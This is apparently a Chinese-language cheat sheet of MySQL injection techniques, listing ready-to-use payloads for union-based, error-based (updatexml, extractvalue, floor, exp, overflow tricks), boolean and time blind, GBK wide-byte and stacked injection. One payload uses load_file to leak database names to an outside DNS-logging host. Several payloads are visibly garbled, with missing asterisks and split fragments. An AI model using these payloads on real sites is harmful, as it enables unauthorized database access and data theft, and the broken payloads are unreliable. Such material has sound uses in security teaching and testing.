Mysql中的基本注入方式
mysql基础
数据库层面的增删改查
CREATE DATABASE test; //创建名为test的数据库 |
数据层面的增删改查
insert into student(name,sex,year)values("张三","男";"1990/6/15"); |
mysql内置函数
user() //查看用户名 |
mysql注释符
1、#注释内容,表示单行注释 |
联合注入
使用limit单个查询
id=-1 union select 1,(select schema_name from information_schema.schemata limit 0,1),3 |
*往后所有的注入,都可以在limit与group_concat中灵活切换*
使用group_concat()分组查询
id=-1 union select 1,(select group_concat(schema_name) from information_schema.schemata),3,4 |
报错注入
基于updatexml
'and updatexml(1,concat(0x7e,(select group_concat(schema_name) from information_schema.schemata),0x7e),1)--+ |
基于extractvalue
'and extractvalue(1,concat(0x7e,(select group_concat(schema_name) from information_schema.schemata),0x7e))--+ |
以下内容来源于互联网,大多数函数的利用都有版本条件或其他条件限制
1.floor()
floor 和group by 搭配使用 利用group by 的key唯一性 和mysql 编码执行顺序导致二次执行产生不同key
select from users where id=1 OR+1e0GROUP BY+CONCAT_WS(0x3a,VERSION(),FLOOR(RAND(0)2)) HAVING+MIN(0)OR+1
数值型注入时 不用闭合‘ 进行注入 利用 or 条件注入
通用型 的一般格式 注入
select from users where id=1 and (select 1 from (select count(),concat(user(),floor(rand(0)2))x from information_schema.tables group by x)a)
2.extractvalue
对XML文档进行查询的函数 和updatexml() 一样 针对5.5版本以后
select * from users where id=1 and extractvalue(1,concat(0x7e,user()))
3.updatexml()
select * from test where id=1 and updatexml(1,concat(0x7e,user()),1)
4.geometrycollection()
select from test where id=1 and geometrycollection((select from(select * from(select user())a)b));
5.multipoint()
select from test where id=1 and multipoint((select from(select * from(select user())a)b));
6.polygon()
select from test where id=1 and polygon((select from(select * from(select user())a)b));
7.multipolygon()
select from test where id=1 and multipolygon((select from(select * from(select user())a)b));
8.linestring()
select from test where id=1 and multilinestring((select from(select * from(select user())a)b));
9.multilinestring()
select from test where id=1 and multilinestring((select from(select * from(select user())a)b));
10.exp()
exp()即为以e为底的对数函数
exp(709) 里面的参数在大于709时函数会报错
ERROR 1690 (22003): DOUBLE value is out of range in ‘exp(710)’
select from test where id=1 and exp(~(select from(select user())a));
11.procedure analyse
select * from users order by 1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1)
12.用户变量
select min(@a:=1) from information_schema.tables group by concat(database()
,@a:=(@a+1)%2)
13.通过NAME_CONST(适用于低版本)
+or+(select * from (select NAME_CONST(version(),1),NAME_CONST(version(),1)) as x)
14.0位取反报错 (BIGINT溢出)
select ~0+!(selectfrom(select user())x);
15.atan,ceil,floor,!,…相减溢出
select !atan((selectfrom(select user())a))-~0;
select !ceil((selectfrom(select user())a))-0;0;
select !floor((select*from(select user())a))-
select !HEX((selectfrom(select user())a))-~0;
select !RAND((selectfrom(select user())a))-0;0;
select !FLOOR((select*from(select user())a))-
select !CEILING((selectfrom(select user())a))-~0;
select !RAND((selectfrom(select user())a))-0;0;
select !TAN((select*from(select user())a))-
select !SQRT((selectfrom(select user())a))-~0;
select !ROUND((selectfrom(select user())a))-0;0;
select !SIGN((select*from(select user())a))-
16.@:=
!(selectfrom(select(concat(@:=0,(select count()frominformation_schema
.columns where table_schema=database()and@:=concat(@,0xa,table_schema,0x3a3a,table_name,0x3a3a,column_name)),@)))x)-00)from(select(concat (@:=0,(select count()from
(select(!x-information_schema
.columns where table_schema=database()and@:=concat (@,0xa,table_name,0x3a3a,column_name)),@))x)a)
(select!x-~0.from(select(concat (@:=0,(select count()frominformation_schema
.columns where table_schema=database()and@:=concat (@,0xa,table_name,0x3a3a,column_name)),@))x)a)
17.^ 按位异或
select !(select*from(select user())a)-0^222;
18.0位表减溢出
(select(!x-0)from(select(select user())x)a)0.from(select(select user())x)a)
(select!x-
19.in溢出
select from users where id in(~0+!(selectfrom(select user())x))
布尔盲注
相比较于联合注入,只不过多了一个截取字符串取ASCII值作比较的过程,原理还是一样的,这里只给出一个demo
1'and length(database())=1# |
时间盲注
在基于布尔盲注的基础上加了if sleep判断
'and if(length(database())=5,sleep(3),1)--+ |
宽字节注入
由于我们输入的单引号被转义,所以id无法逃逸。一般情况下此处无法注入,但有一个特例,在数据库是GBK编码时,可以利用宽字节注入。宽字节的格式是在地址栏后先加一个%df,再加单引号,因为反斜杠 的编码为%5c,在GBK编码中,%df%5c是繁体汉字“连”,所以这个时候单引号可以成功逃逸。
其流程和联合注入一样,但是这里不能使用引号,所以要套娃
id=-1%df' union select 1,database(),3,4--+ |
DNSlog注入
执行SQL语句,只不过把执行了SQL语句之后返回的结果通过另一种形式反馈给了我们——dnslog
前提:只有在secure_file_priv不为off/null的情况下才能实现
and (select load_file(concat('//',(select database()),'.4xxx5.ceye.io/sqli'))) |
堆叠注入
前提:允许执行多条语句,如采用mysqli_multi_query()等方法
原理:可以执行多条语句,多语句间用分号隔开
有回显的直接联合注入 |
杂七杂八的注入
cookie注入 |